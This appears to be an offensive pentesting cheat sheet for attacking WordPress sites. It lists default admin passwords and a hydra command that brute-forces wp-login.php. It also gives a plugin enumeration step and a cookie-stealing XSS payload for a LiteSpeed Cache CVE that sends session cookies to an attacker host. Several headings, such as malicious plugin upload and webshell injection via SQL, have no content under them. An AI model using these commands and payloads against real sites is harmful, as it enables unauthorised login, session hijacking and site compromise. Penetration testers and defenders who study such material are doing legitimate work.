Exploiting Wordpress
Brute-Forcing Login Credentials:
# Default Password
admin/admin or admin/password
# BruteForce
hydra -l admin -P wordlist.txt <target> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"Enumerating with WPScan:
Exploiting Vulnerable Plugins:
# Check
/wp-content/plugins/: curl http://<target>/wp-content/plugins/readme.txt
# Look for exploit on searchsploit
searchsploit <plugin_name> <version>
# LiteSpeed Cache (<= 5.7, CVE-2023-40000):
<script>document.location='http://<attacker_ip>/steal?cookie='+document.cookie;</script>Uploading a Malicious Plugin:
Exploiting XML-RPC for DoS or Brute-Force:
Cross-Site Scripting (XSS) via Plugins:
PHPMyAdmin
LFI/RFI
Inject webshell using SQL query
Last updated